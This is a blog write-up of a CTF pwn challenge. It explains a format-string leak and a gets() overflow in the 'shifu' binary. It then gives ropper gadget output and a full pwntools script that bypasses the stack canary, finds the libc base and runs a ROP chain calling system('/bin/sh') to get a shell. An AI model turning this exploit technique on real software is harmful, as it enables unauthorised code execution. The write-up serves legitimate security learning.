BIC CTF : pwn challenge
This blog is about blacks_in_cybersecurity CTF that I participated recently with an aim to do all reversing and pwn challenges that were there.
Unfortunately i was unable to do all reversing challenges. I blooded the pwn challenge and in this blog i will show how i went about solving it.
PWN:ROPROP
First we give respect to the challenge creator graypwn .Then jumping right into the challenge we notice that it has two vulnerabilities using ghidra.
- Format string vulnerability — prinft function is printing out the user input directly without a string formatter.
2. BOF by using the dangerous gets function to get user input in hide function — it is basically impossible to restrain how much the gets function takes in.
Thought solution
- we can use the format string vulnerability to get the canary value → this way we will have bypassed canary
- we use the printf address getting leaked in main function to calculate the libc library base
- we can take advantage of gets function to take control of the program counter
- we can build a simple rop chain since the binary and its libc has all the gadgets that we require to build one
- we get a shell 🤘
Getting canary value
- Use gdb or any other favourite debugger , leak the addresses using the format string vulnerability and compare to the canary value in the stack.
- Basically using gdb once you recognize the address you have leaked and where the canary value is , you can then calculate number of address to the canary value on the stack.
Getting offset to return address
- Here you will probably want to send the input like this:
data + canary + pattern
- This will ensure you avoid a lot of problems with the canary :)
- The main reason to why this is important is that there is always a canary check and if your overflow tampered with the canary value the program will exit with error “ stack smashing detected”
Creating rop chain
- For this we can get the libc base address by subtracting the printf libc offset from printf address leak
- we can build a simple rop chain that gets system to execute /bin/sh program.
- This how you can use ropper to get the gadgets
➜ haha ropper
(ropper)> file libc.so.6
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] File loaded.
(shifu/ELF/x86_64)> search /1/ ret
[INFO] Searching for gadgets: ret
[INFO] File: shifu
0x0000000000175f94: retf 5; syscall;
0x00000000000f872e: ret;
(shifu/ELF/x86_64)> search /1/ pop rdi
[INFO] File: libc.so.6
0x0000000000125bb1: pop rdi; call rax;
0x000000000002d549: pop rdi; jmp rax;
0x00000000000eac54: pop rdi; jmp rdi;
0x00000000001bc10d: pop rdi; ret 0xffe6;
0x000000000002a3e5: pop rdi; ret;From here we can get this script that will give us a shell :)
#!/usr/bin/env python3
# Author : trustie_rity
from pwn import *
import re
context.update(arch="amd64",os="linux")
context.terminal = ['alacritty', '-e', 'zsh', '-c']
elf = ELF("./shifu")
if args.R:
p = remote("127.0.0.1", "1337")
else:
p = elf.process()
#gdb.attach(p)
# getting the addresses via leak and grace from the challenge creator
payload = b"%31$p"
log.info(f" { p.recv() } ")
p.sendline(payload)
#p.recv()
leak = p.recv()
addresses = re.findall(rb"0x[0-9a-zA-Z]+" , leak)
canary = addresses[0]
printf = addresses[1]
log.info(f"Leaked printf address: { printf } ")
log.info(f"Leaked canary address: { canary } ")
# getting libc base
libc = elf.libc
libc.address = int(printf,16) - libc.sym.printf
log.info(f"Leaked libc base address: { hex(libc.address) } ")
# rop chain
ret = libc.address + 0x29cd6
pop_rdi = libc.address + 0x2a3e5
bin_sh = next(libc.search(b"/bin/sh\x00"))
system = libc.sym.system
rop = b""
rop += p64(ret)
rop += p64(pop_rdi)
rop += p64(bin_sh)
rop += p64(system)
# offset to canary
offset = 8
payload = b"A" * 136
payload += p64(int(canary,16))
payload += cyclic(offset)
payload += rop
p.sendline(payload)
p.interactive()Using the above script ,we successfully explore a weird machine. We get a shell and now we can play around with it.
There is also a video walthrough of the same , watch it here :)
